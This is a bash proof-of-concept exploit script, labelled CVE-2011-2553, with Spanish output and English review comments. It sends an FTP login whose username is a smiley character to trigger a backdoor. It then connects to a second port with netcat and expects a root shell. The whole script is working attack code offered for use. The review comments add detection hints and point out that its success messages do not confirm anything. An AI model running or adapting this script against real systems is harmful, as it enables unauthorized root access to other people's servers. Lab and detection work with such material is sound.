POC / escalarprivile.sh SH
#!/bin/bash

# Exploit para CVE-2011-2553 - FTP Service Vulnerability
# Uso: ./exploit.sh <IP> [puerto_ftp] [puerto_backdoor]

# ANSI colour escapes; they are expanded later by `echo -e`.
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # reset to the terminal default

# Target settings come from the positional arguments, each with a fallback.
# NOTE(review): 172.17.0.2 looks like a Docker default-bridge address,
# presumably a local lab container.
IP="${1:-172.17.0.2}"
FTP_PORT="${2:-21}"
BACKDOOR_PORT="${3:-5000}"

# Banner echoing the effective settings.
# NOTE(review): the CVE id is the author's label; nothing in this script
# checks the target's software or version.
echo -e "${YELLOW}[*] Exploit para CVE-2011-2553 - FTP Service${NC}"
echo -e "${YELLOW}[*] Objetivo: ${IP}${NC}"
echo -e "${YELLOW}[*] Puerto FTP: ${FTP_PORT}${NC}"
echo -e "${YELLOW}[*] Puerto Backdoor: ${BACKDOOR_PORT}${NC}"
echo ""

# Dependency check: the rest of the script shells out to `nc`.
# Returns 0 when `nc` resolves; otherwise prints an install hint and
# terminates the whole script with status 1.
check_nc() {
    # Guard clause: nothing more to do when nc is available.
    command -v nc > /dev/null 2>&1 && return 0

    echo -e "${RED}[!] Error: netcat no está instalado${NC}"
    echo "Instala con: apt-get install netcat"
    exit 1
}

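# Stage one: open one FTP control connection and send a fixed three-line
# dialogue through nc.
# Globals:   IP, FTP_PORT (read); GREEN, RED, YELLOW, NC (read)
# Outputs:   progress messages and whatever the server replies, on stdout
# Returns:   0 when nc exits 0; otherwise exits the script with status 1
#
# The success message depends only on nc's exit status. That status says the
# TCP exchange completed; it does not show how the server reacted to the USER
# line.
# Defender note: on the wire this is an FTP login attempt whose USER argument
# is the single code point U+263A, which is distinctive enough to match in
# FTP server logs or an IDS rule.
exploit_ftp() {
    echo -e "${YELLOW}[*] Conectando al servicio FTP en puerto $FTP_PORT...${NC}"

    # USER carrying U+263A, a fixed PASS, then QUIT; -w 5 is nc's timeout.
    # Host and port are quoted so each reaches nc as exactly one argument,
    # even if it contains whitespace or glob characters.
    if {
        echo -e "USER \u263A"
        echo "PASS exploit"
        echo "QUIT"
    } | nc -w 5 "$IP" "$FTP_PORT"; then
        echo -e "${GREEN}[+] Payload enviado al servicio FTP${NC}"
    else
        echo -e "${RED}[!] Error al conectar con el servicio FTP${NC}"
        exit 1
    fi
}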

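# Stage two: open an interactive nc session to BACKDOOR_PORT on the target.
# Globals:   IP, BACKDOOR_PORT (read); GREEN, RED, YELLOW, NC (read)
# Outputs:   status messages on stdout; the nc session uses the terminal
# Returns:   0 in every case (a failed connect is only reported)
#
# The "shell root" line is printed before any connection is attempted, so it
# is a hint to the operator, not evidence that anything succeeded.
# Defender note: the observable here is a TCP connection to BACKDOOR_PORT
# shortly after the FTP session from the same source.
connect_backdoor() {
    echo ""
    echo -e "${YELLOW}[*] Intentando conectar a la backdoor en puerto $BACKDOOR_PORT...${NC}"
    echo -e "${GREEN}[+] Si la explotación fue exitosa, deberías tener shell root${NC}"
    echo -e "${YELLOW}[*] Conectando...${NC}"
    echo ""

    # Quoted so host and port are passed to nc as one argument each.
    if ! nc -w 5 "$IP" "$BACKDOOR_PORT"; then
        echo -e "${RED}[!] No se pudo conectar a la backdoor${NC}"
    fi
}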

# Entry point: dependency check, FTP stage, fixed pause, then the connection
# to the second port. Takes no arguments; the settings are read from the
# globals assigned at the top of the script.
main() {
    local -r pause_seconds=2

    echo -e "${YELLOW}[*] Iniciando explotación...${NC}"

    # Either of these two steps exits the script on failure.
    check_nc
    exploit_ftp

    # Fixed delay between the two stages.
    echo -e "${YELLOW}[*] Esperando 2 segundos...${NC}"
    sleep "${pause_seconds}"

    connect_backdoor
}

# On SIGINT/SIGTERM print a notice and leave with a non-zero status.
trap 'echo -e "\n${RED}[!] Explotación interrumpida${NC}"; exit 1' INT TERM

# A target has to be named explicitly: with no arguments the script prints
# its usage and stops here, so the default IP is never used on its own.
# The banner above this point has already been printed by then.
if (( $# == 0 )); then
    echo -e "${YELLOW}[*] Uso: ${0} <IP> [puerto_ftp] [puerto_backdoor]${NC}"
    echo -e "${YELLOW}[*] Ejemplo: ${0} 172.17.0.2 21 5000${NC}"
    echo -e "${YELLOW}[*] Ejemplo: ${0} 172.17.0.2${NC}"
    exit 1
fi

main